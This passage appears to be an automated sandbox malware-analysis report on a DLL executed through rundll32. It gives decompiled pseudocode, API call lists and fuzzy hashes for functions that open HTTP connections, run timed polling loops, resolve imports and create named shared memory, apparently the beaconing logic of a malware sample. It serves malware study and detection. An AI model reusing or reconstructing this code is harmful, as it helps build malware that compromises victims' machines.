                Instruction addresses (disassembly column, instruction text not preserved): 0x04b96bef 0x04b96bef 0x04b96bef 0x04b96c04 0x04b96c06 0x04b96c0b 0x04b96c0f 0x04b96c17 0x04b96c1d 0x04b96c21 0x04b96c29 0x04b96c31 0x04b96c31 0x04b96c33 0x04b96c3f 0x04b96c4e 0x04b96c53 0x04b96c56 0x04b96c5b 0x04b96c5e 0x04b96c63 0x04b96c66 0x04b96c72 0x04b96c7f 0x04b96c81 0x04b96c87 0x04b96c8c 0x04b96c97 0x04b96c99 0x04b96c9c 0x04b96ca2 0x04b96ca4 0x04b96cad 0x04b96cb8 0x04b96cba 0x04b96cbd 0x04b96cbd 0x04b96cbf 0x04b96cc4 0x04b96cd0 0x04b96cd2 0x04b96cd5 0x04b96cd7 0x04b96cdc 0x04b96ce0 0x04b96ce2 0x04b96ce7 0x04b96cf3 0x04b96cf5 0x04b96d01 0x04b96d03 0x04b96d03 0x04b96d0e 0x04b96d12 0x04b96d14 0x04b96d19 0x04b96d25 0x04b96d27 0x04b96d33 0x04b96d35 0x04b96d35 0x04b96d3b 0x04b96d4e 0x04b96d52 0x04b96d57 0x04b96d5b 0x04b96d5e 0x04b96d63 0x04b96d6d 0x04b96d6f 0x04b96d76 0x04b96d8e 0x04b96d92 0x04b96d9e 0x04b96da3 0x04b96dac 0x04b96dbd 0x04b96dc1 0x04b96dca 0x04b96dd0 0x04b96dd8 0x04b96ddd 0x04b96dea 0x04b96df0 0x04b96dfc 0x04b96e02 0x04b96e03 0x04b96e08 0x04b96e0e 0x04b96e14 0x04b96e1b 0x04b96e22 0x04b96e28 0x04b96e2f 0x04b96e33 0x04b96e3e 0x04b96e43 0x04b96e49 0x04b96e52 0x04b96e52 0x04b96e63 0x04b96e69 0x04b96e69 0x04b96e73 0x04b96e73 0x04b96e81 0x04b96e81 0x04b96e92 0x04b96e92 0x04b96ea0 0x04b96ea0 0x04b96eb1

                APIs
                • RtlAllocateHeap.NTDLL ref: 04B96C17
                • GetTickCount.KERNEL32 ref: 04B96C2B
                • wsprintfA.USER32 ref: 04B96C7A
                • wsprintfA.USER32 ref: 04B96C97
                • wsprintfA.USER32 ref: 04B96CB8
                • wsprintfA.USER32 ref: 04B96CD0
                • wsprintfA.USER32 ref: 04B96CF3
                • HeapFree.KERNEL32(00000000,00000000), ref: 04B96D03
                • wsprintfA.USER32 ref: 04B96D25
                • HeapFree.KERNEL32(00000000,00000000), ref: 04B96D35
                • wsprintfA.USER32 ref: 04B96D6D
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04B96D88
                • GetTickCount.KERNEL32 ref: 04B96D98
                • RtlEnterCriticalSection.NTDLL(051095C0), ref: 04B96DAC
                • RtlLeaveCriticalSection.NTDLL(051095C0), ref: 04B96DCA
                  • Part of subcall function 04B95D8A: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,76B5C740,04B96DDD,00000000,05109600), ref: 04B95DB5
                  • Part of subcall function 04B95D8A: lstrlen.KERNEL32(00000000,?,76B5C740,04B96DDD,00000000,05109600), ref: 04B95DBD
                  • Part of subcall function 04B95D8A: strcpy.NTDLL ref: 04B95DD4
                  • Part of subcall function 04B95D8A: lstrcat.KERNEL32(00000000,00000000), ref: 04B95DDF
                  • Part of subcall function 04B95D8A: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,04B96DDD,?,76B5C740,04B96DDD,00000000,05109600), ref: 04B95DFC
                • StrTrimA.SHLWAPI(00000000,04B99294,00000000,05109600), ref: 04B96DFC
                  • Part of subcall function 04B927B3: lstrlen.KERNEL32(05109CE0,00000000,00000000,00000000,04B96E08,00000000), ref: 04B927C3
                  • Part of subcall function 04B927B3: lstrlen.KERNEL32(?), ref: 04B927CB
                  • Part of subcall function 04B927B3: lstrcpy.KERNEL32(00000000,05109CE0), ref: 04B927DF
                  • Part of subcall function 04B927B3: lstrcat.KERNEL32(00000000,?), ref: 04B927EA
                • lstrcpy.KERNEL32(00000000,?), ref: 04B96E1B
                • lstrcpy.KERNEL32(00000000,?), ref: 04B96E22
                • lstrcat.KERNEL32(00000000,?), ref: 04B96E2F
                • lstrcat.KERNEL32(00000000,00000000), ref: 04B96E33
                  • Part of subcall function 04B9469F: WaitForSingleObject.KERNEL32(00000000,746981D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04B94751
                • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04B96E63
                • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 04B96E73
                • RtlFreeHeap.NTDLL(00000000,00000000,00000000,05109600), ref: 04B96E81
                • HeapFree.KERNEL32(00000000,?), ref: 04B96E92
                • RtlFreeHeap.NTDLL(00000000,00000000), ref: 04B96EA0
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$AllocateCountCriticalSectionTickTrim$EnterLeaveObjectSingleWaitstrcpy
                • String ID: Uet$T1y.
                • API String ID: 186568778-1202656988
                • Opcode ID: ae9a4854c60fc9633584137213abae36f165518cd2bd82bfe4ab4b2d7096ea39
                • Instruction ID: 198c1c64a5484f604c496055e3bb71583c6f7841e59b72de0f4addb04e8f374c
                • Opcode Fuzzy Hash: ae9a4854c60fc9633584137213abae36f165518cd2bd82bfe4ab4b2d7096ea39
                • Instruction Fuzzy Hash: A171D3B1500644BFDB21AB74EE48E5B3BE8EB8D700B050566F908D3221DE3AED19DB75
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 92%
                			E04B97C28(void* __eax, void* __ecx, long __esi, char* _a4) {
                				void _v8;
                				long _v12;
                				void _v16;
                				void* _t34;
                				void* _t38;
                				void* _t40;
                				char* _t56;
                				long _t57;
                				void* _t58;
                				intOrPtr _t59;
                				long _t65;
                
                				_t65 = __esi;
                				_t58 = __ecx;
                				_v16 = 0xea60;
                				__imp__( *(__esi + 4));
                				_v12 = __eax + __eax;
                				_t56 = E04B96601(__eax + __eax + 1);
                				if(_t56 != 0) {
                					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
                						E04B94130(_t56);
                					} else {
                						E04B94130( *(__esi + 4));
                						 *(__esi + 4) = _t56;
                					}
                				}
                				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
                				 *(_t65 + 0x10) = _t34;
                				if(_t34 == 0 || InternetSetStatusCallback(_t34, E04B97BBD) == 0xffffffff) {
                					L15:
                					return GetLastError();
                				} else {
                					ResetEvent( *(_t65 + 0x1c));
                					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
                					 *(_t65 + 0x14) = _t38;
                					if(_t38 != 0 || GetLastError() == 0x3e5 && E04B9705E( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
                						_t59 =  *0x4b9a348; // 0x56d5a8
                						_t15 = _t59 + 0x4b9b73b; // 0x544547
                						_v8 = 0x84404000;
                						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
                						 *(_t65 + 0x18) = _t40;
                						if(_t40 == 0) {
                							goto L15;
                						}
                						_t57 = 4;
                						_v12 = _t57;
                						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
                							_v8 = _v8 | 0x00000100;
                							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
                						}
                						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
                							goto L15;
                						} else {
                							return 0;
                						}
                					} else {
                						goto L15;
                					}
                				}
                			}

                Instruction addresses (disassembly column, instruction text not preserved): 0x04b97c28 0x04b97c28 0x04b97c33 0x04b97c3a 0x04b97c42 0x04b97c4c 0x04b97c52 0x04b97c65 0x04b97c75 0x04b97c67 0x04b97c6a 0x04b97c6f 0x04b97c6f 0x04b97c65 0x04b97c85 0x04b97c8b 0x04b97c90 0x04b97d79 0x00000000 0x04b97cab 0x04b97cae 0x04b97cc1 0x04b97cc7 0x04b97ccc 0x04b97cf4 0x04b97d07 0x04b97d11 0x04b97d14 0x04b97d1a 0x04b97d1f 0x00000000 0x00000000 0x04b97d23 0x04b97d2f 0x04b97d40 0x04b97d42 0x04b97d53 0x04b97d53 0x04b97d63 0x00000000 0x04b97d75 0x00000000 0x04b97d75 0x00000000 0x00000000 0x00000000 0x04b97ccc

                APIs
                • lstrlen.KERNEL32(?,00000008,74654D40), ref: 04B97C3A
                  • Part of subcall function 04B96601: RtlAllocateHeap.NTDLL(00000000,00000000,04B964FD), ref: 04B9660D
                • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 04B97C5D
                • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 04B97C85
                • InternetSetStatusCallback.WININET(00000000,04B97BBD), ref: 04B97C9C
                • ResetEvent.KERNEL32(?), ref: 04B97CAE
                • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 04B97CC1
                • GetLastError.KERNEL32 ref: 04B97CCE
                • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 04B97D14
                • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 04B97D32
                • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 04B97D53
                • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 04B97D5F
                • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 04B97D6F
                • GetLastError.KERNEL32 ref: 04B97D79
                  • Part of subcall function 04B94130: RtlFreeHeap.NTDLL(00000000,00000000,04B9658A,00000000,?,00000000,00000000), ref: 04B9413C
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                • String ID: @MetNet
                • API String ID: 2290446683-2109406137
                • Opcode ID: efb7fa44e45a5563a6628271ce41710a441f272a75ce5971a717f1ff8d9f75fd
                • Instruction ID: 1d7d2d642ca98cf42425c533ad4cbfedd4ec228aa41142e4ad22e2e5edf17b54
                • Opcode Fuzzy Hash: efb7fa44e45a5563a6628271ce41710a441f272a75ce5971a717f1ff8d9f75fd
                • Instruction Fuzzy Hash: 6241A9B1500604FBDB319FA1ED48E6B7BF8EF49B00F14096AB512A21A0EA34AD10DA20
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 101 4b91898-4b918ca memset CreateWaitableTimerA 102 4b91a4b-4b91a51 101->102 103 4b918d0-4b91929 _allmul SetWaitableTimer WaitForMultipleObjects 101->103 110 4b91a55-4b91a5f 102->110 104 4b9192f-4b91932 103->104 105 4b919b3-4b919b9 103->105 107 4b9193d 104->107 108 4b91934 call 4b94202 104->108 109 4b919ba-4b919be 105->109 114 4b91947 107->114 115 4b91939-4b9193b 108->115 112 4b919ce-4b919d2 109->112 113 4b919c0-4b919c2 109->113 112->109 116 4b919d4-4b919de CloseHandle 112->116 113->112 117 4b9194b-4b91950 114->117 115->107 115->114 116->110 118 4b91963-4b91990 call 4b94315 117->118 119 4b91952-4b91959 117->119 123 4b919e0-4b919e5 118->123 124 4b91992-4b9199d 118->124 119->118 120 4b9195b 119->120 120->118 126 4b91a04-4b91a0c 123->126 127 4b919e7-4b919ed 123->127 124->117 125 4b9199f-4b919af call 4b916cd 124->125 125->105 129 4b91a12-4b91a40 _allmul SetWaitableTimer WaitForMultipleObjects 126->129 127->105 128 4b919ef-4b91a02 call 4b9554c 127->128 128->129 129->117 132 4b91a46 129->132 132->105
                C-Code - Quality: 83%
                			E04B91898(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                				void _v48;
                				long _v52;
                				struct %anon52 _v60;
                				char _v72;
                				long _v76;
                				void* _v80;
                				union _LARGE_INTEGER _v84;
                				struct %anon52 _v92;
                				void* _v96;
                				void* _v100;
                				union _LARGE_INTEGER _v104;
                				long _v108;
                				struct %anon52 _v124;
                				long _v128;
                				struct %anon52 _t46;
                				void* _t51;
                				long _t53;
                				void* _t54;
                				struct %anon52 _t61;
                				long _t65;
                				struct %anon52 _t66;
                				void* _t69;
                				void* _t73;
                				signed int _t74;
                				void* _t76;
                				void* _t78;
                				void** _t82;
                				signed int _t86;
                				void* _t89;
                
                				_t76 = __edx;
                				_v52 = 0;
                				memset( &_v48, 0, 0x2c);
                				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                				_t46 = CreateWaitableTimerA(0, 1, 0);
                				_v60 = _t46;
                				if(_t46 == 0) {
                					_v92.HighPart = GetLastError();
                				} else {
                					_push(0xffffffff);
                					_push(0xff676980);
                					_push(0);
                					_push( *0x4b9a2e0);
                					_v76 = 0;
                					_v80 = 0;
                					L04B9837A();
                					_v84.LowPart = _t46;
                					_v80 = _t76;
                					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                					_t51 =  *0x4b9a30c; // 0x2c0
                					_v76 = _t51;
                					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                					_v108 = _t53;
                					if(_t53 == 0) {
                						if(_a8 != 0) {
                							L4:
                							 *0x4b9a2ec = 5;
                						} else {
                							_t69 = E04B94202(_t76); // executed
                							if(_t69 != 0) {
                								goto L4;
                							}
                						}
                						_v104.LowPart = 0;
                						L6:
                						L6:
                						if(_v104.LowPart == 1 && ( *0x4b9a300 & 0x00000001) == 0) {
                							_v104.LowPart = 2;
                						}
                						_t74 = _v104.LowPart;
                						_t58 = _t74 << 4;
                						_t78 = _t89 + (_t74 << 4) + 0x38;
                						_t75 = _t74 + 1;
                						_v92.LowPart = _t74 + 1;
                						_t61 = E04B94315( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
                						_v124 = _t61;
                						if(_t61 != 0) {
                							goto L17;
                						}
                						_t66 = _v92;
                						_v104.LowPart = _t66;
                						if(_t66 != 3) {
                							goto L6;
                						} else {
                							_v124.HighPart = E04B916CD(_t75,  &_v72, _a4, _a8);
                						}
                						goto L12;
                						L17:
                						__eflags = _t61 - 0x10d2;
                						if(_t61 != 0x10d2) {
                							_push(0xffffffff);
                							_push(0xff676980);
                							_push(0);
                							_push( *0x4b9a2e4);
                							goto L21;
                						} else {
                							__eflags =  *0x4b9a2e8; // 0x0
                							if(__eflags == 0) {
                								goto L12;
                							} else {
                								_t61 = E04B9554C();
                								_push(0xffffffff);
                								_push(0xdc3cba00);
                								_push(0);
                								_push( *0x4b9a2e8);
                								L21:
                								L04B9837A();
                								_v104.LowPart = _t61;
                								_v100 = _t78;
                								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                								_v128 = _t65;
                								__eflags = _t65;
                								if(_t65 == 0) {
                									goto L6;
                								} else {
                									goto L12;
                								}
                							}
                						}
                						L25:
                					}
                					L12:
                					_t82 =  &_v72;
                					_t73 = 3;
                					do {
                						_t54 =  *_t82;
                						if(_t54 != 0) {
                							HeapFree( *0x4b9a2d8, 0, _t54);
                						}
                						_t82 =  &(_t82[4]);
                						_t73 = _t73 - 1;
                					} while (_t73 != 0);
                					CloseHandle(_v80);
                				}
                				return _v92.HighPart;
                				goto L25;
                			}

                APIs
                • memset.NTDLL ref: 04B918B2
                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04B918BE
                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04B918E6
                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 04B91906
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,04B93660,?), ref: 04B91921
                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,04B93660,?,00000000), ref: 04B919C8
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04B93660,?,00000000,?,?), ref: 04B919D8
                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04B91A12
                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 04B91A2C
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04B91A38
                  • Part of subcall function 04B94202: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,051093D8,00000000,?,746AF710,00000000,746AF730), ref: 04B94251
                  • Part of subcall function 04B94202: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05109410,?,00000000,30314549,00000014,004F0053,051093CC), ref: 04B942EE
                  • Part of subcall function 04B94202: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04B91939), ref: 04B94300
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04B93660,?,00000000,?,?), ref: 04B91A4B
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                • String ID: Uet$@MetNet
                • API String ID: 3521023985-1616585941
                • Opcode ID: a0d3bcdf7873e3637db543d628fb929abdea027235ce4c0c9afecb1c0806456e
                • Instruction ID: 7422dc273e2f3ed11c5eaf75725e5a7d7aaf6104af921d72d56a8b107af5093a
                • Opcode Fuzzy Hash: a0d3bcdf7873e3637db543d628fb929abdea027235ce4c0c9afecb1c0806456e
                • Instruction Fuzzy Hash: 13516E71108321BFEB10AF259D44D5FBBE8EB89724F108A2EF4A592250D774AD05DFA2
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                C-Code - Quality: 51%
                			E04B98065(long _a4, long _a8) {
                				signed int _v8;
                				intOrPtr _v16;
                				LONG* _v28;
                				long _v40;
                				long _v44;
                				long _v48;
                				CHAR* _v52;
                				long _v56;
                				CHAR* _v60;
                				long _v64;
                				signed int* _v68;
                				char _v72;
                				signed int _t76;
                				signed int _t80;
                				signed int _t81;
                				intOrPtr* _t82;
                				intOrPtr* _t83;
                				intOrPtr* _t85;
                				intOrPtr* _t90;
                				intOrPtr* _t95;
                				intOrPtr* _t98;
                				struct HINSTANCE__* _t99;
                				void* _t102;
                				intOrPtr* _t104;
                				void* _t115;
                				long _t116;
                				void _t125;
                				void* _t131;
                				signed short _t133;
                				struct HINSTANCE__* _t138;
                				signed int* _t139;
                
                				_t139 = _a4;
                				_v28 = _t139[2] + 0x4b90000;
                				_t115 = _t139[3] + 0x4b90000;
                				_t131 = _t139[4] + 0x4b90000;
                				_v8 = _t139[7];
                				_v60 = _t139[1] + 0x4b90000;
                				_v16 = _t139[5] + 0x4b90000;
                				_v64 = _a8;
                				_v72 = 0x24;
                				_v68 = _t139;
                				_v56 = 0;
                				asm("stosd");
                				_v48 = 0;
                				_v44 = 0;
                				_v40 = 0;
                				if(( *_t139 & 0x00000001) == 0) {
                					_a8 =  &_v72;
                					RaiseException(0xc06d0057, 0, 1,  &_a8);
                					return 0;
                				}
                				_t138 =  *_v28;
                				_t76 = _a8 - _t115 >> 2 << 2;
                				_t133 =  *(_t131 + _t76);
                				_a4 = _t76;
                				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                				_v56 = _t80;
                				_t81 = _t133 + 0x4b90002;
                				if(_t80 == 0) {
                					_t81 = _t133 & 0x0000ffff;
                				}
                				_v52 = _t81;
                				_t82 =  *0x4b9a1c0; // 0x0
                				_t116 = 0;
                				if(_t82 == 0) {
                					L6:
                					if(_t138 != 0) {
                						L18:
                						_t83 =  *0x4b9a1c0; // 0x0
                						_v48 = _t138;
                						if(_t83 != 0) {
                							_t116 =  *_t83(2,  &_v72);
                						}
                						if(_t116 != 0) {
                							L32:
                							 *_a8 = _t116;
                							L33:
                							_t85 =  *0x4b9a1c0; // 0x0
                							if(_t85 != 0) {
                								_v40 = _v40 & 0x00000000;
                								_v48 = _t138;
                								_v44 = _t116;
                								 *_t85(5,  &_v72);
                							}
                							return _t116;
                						} else {
                							if(_t139[5] == _t116 || _t139[7] == _t116) {
                								L27:
                								_t116 = GetProcAddress(_t138, _v52);
                								if(_t116 == 0) {
                									_v40 = GetLastError();
                									_t90 =  *0x4b9a1bc; // 0x0
                									if(_t90 != 0) {
                										_t116 =  *_t90(4,  &_v72);
                									}
                									if(_t116 == 0) {
                										_a4 =  &_v72;
                										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                										_t116 = _v44;
                									}
                								}
                								goto L32;
                							} else {
                								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                									_t116 =  *(_a4 + _v16);
                									if(_t116 != 0) {
                										goto L32;
                									}
                								}
                								goto L27;
                							}
                						}
                					}
                					_t98 =  *0x4b9a1c0; // 0x0
                					if(_t98 == 0) {
                						L9:
                						_t99 = LoadLibraryA(_v60); // executed
                						_t138 = _t99;
                						if(_t138 != 0) {
                							L13:
                							if(InterlockedExchange(_v28, _t138) == _t138) {
                								FreeLibrary(_t138);
                							} else {
                								if(_t139[6] != 0) {
                									_t102 = LocalAlloc(0x40, 8);
                									if(_t102 != 0) {
                										 *(_t102 + 4) = _t139;
                										_t125 =  *0x4b9a1b8; // 0x0
                										 *_t102 = _t125;
                										 *0x4b9a1b8 = _t102;
                									}
                								}
                							}
                							goto L18;
                						}
                						_v40 = GetLastError();
                						_t104 =  *0x4b9a1bc; // 0x0
                						if(_t104 == 0) {
                							L12:
                							_a8 =  &_v72;
                							RaiseException(0xc06d007e, 0, 1,  &_a8);
                							return _v44;
                						}
                						_t138 =  *_t104(3,  &_v72);
                						if(_t138 != 0) {
                							goto L13;
                						}
                						goto L12;
                					}
                					_t138 =  *_t98(1,  &_v72);
                					if(_t138 != 0) {
                						goto L13;
                					}
                					goto L9;
                				}
                				_t116 =  *_t82(0,  &_v72);
                				if(_t116 != 0) {
                					goto L33;
                				}
                				goto L6;
                			}

                APIs
                • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04B980DE
                • LoadLibraryA.KERNEL32(?), ref: 04B9815B
                • GetLastError.KERNEL32 ref: 04B98167
                • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 04B9819A
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: ExceptionRaise$ErrorLastLibraryLoad
                • String ID: $$@MetNet
                • API String ID: 948315288-3365357938
                • Opcode ID: be7d853429fe6daeb3d63c47e63279469f40de7c39d709ccf0de756a67f18e5f
                • Instruction ID: 63c20b5397a04e97f0aaa4efb84019710cbc778a3676a976cd2cf10c2ebb55cc
                • Opcode Fuzzy Hash: be7d853429fe6daeb3d63c47e63279469f40de7c39d709ccf0de756a67f18e5f
                • Instruction Fuzzy Hash: AC813875A10609AFDF14DFA9D984AAEBBF4FB49300F10806AE905E7340EB74ED04CB60
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 74%
                			E04B94B7B(intOrPtr __edx, void** _a4, void** _a8) {
                				intOrPtr _v8;
                				struct _FILETIME* _v12;
                				short _v56;
                				struct _FILETIME* _t12;
                				intOrPtr _t13;
                				void* _t17;
                				void* _t21;
                				intOrPtr _t27;
                				long _t28;
                				void* _t30;
                
                				_t27 = __edx;
                				_t12 =  &_v12;
                				GetSystemTimeAsFileTime(_t12);
                				_push(0x192);
                				_push(0x54d38000);
                				_push(_v8);
                				_push(_v12);
                				L04B98374();
                				_push(_t12);
                				_v12 = _t12;
                				_t13 =  *0x4b9a348; // 0x56d5a8
                				_t5 = _t13 + 0x4b9b87a; // 0x5108e22
                				_t6 = _t13 + 0x4b9b594; // 0x530025
                				_push(0x16);
                				_push( &_v56);
                				_v8 = _t27;
                				L04B97FDA();
                				_t17 = CreateFileMappingW(0xffffffff, 0x4b9a34c, 4, 0, 0x1000,  &_v56); // executed
                				_t30 = _t17;
                				if(_t30 == 0) {
                					_t28 = GetLastError();
                				} else {
                					if(GetLastError() == 0xb7) {
                						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                						if(_t21 == 0) {
                							_t28 = GetLastError();
                							if(_t28 != 0) {
                								goto L6;
                							}
                						} else {
                							 *_a4 = _t30;
                							 *_a8 = _t21;
                							_t28 = 0;
                						}
                					} else {
                						_t28 = 2;
                						L6:
                						CloseHandle(_t30);
                					}
                				}
                				return _t28;
                			}

                APIs
                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,04B93528,?,?,4D283A53,?,?), ref: 04B94B87
                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04B94B9D
                • _snwprintf.NTDLL ref: 04B94BC2
                • CreateFileMappingW.KERNELBASE(000000FF,04B9A34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 04B94BDE
                • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04B93528,?,?,4D283A53,?), ref: 04B94BF0
                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 04B94C07
                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,04B93528,?,?,4D283A53), ref: 04B94C28
                • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04B93528,?,?,4D283A53,?), ref: 04B94C30
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                • String ID: @MetNet
                • API String ID: 1814172918-2109406137
                • Opcode ID: afb8dc6c0f805db62a4ea92e66da07dfbef8f994dc03e6b863b6766588eec9c8
                • Instruction ID: affb63dea77dfb5a9ec0f96ca7cdcabb199d8551c0b3c3bbf901338c03936908
                • Opcode Fuzzy Hash: afb8dc6c0f805db62a4ea92e66da07dfbef8f994dc03e6b863b6766588eec9c8
                • Instruction Fuzzy Hash: 0F2190B2604208BFDB11AB68DD05F9E77F9EB88750F214175F619E7290EA70ED058B60
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                C-Code - Quality: 86%
                			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                				long _v8;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				char _t9;
                				void* _t10;
                				void* _t18;
                				void* _t23;
                				void* _t36;
                
                				_push(__ecx);
                				_t9 = _a8;
                				_v8 = 1;
                				if(_t9 == 0) {
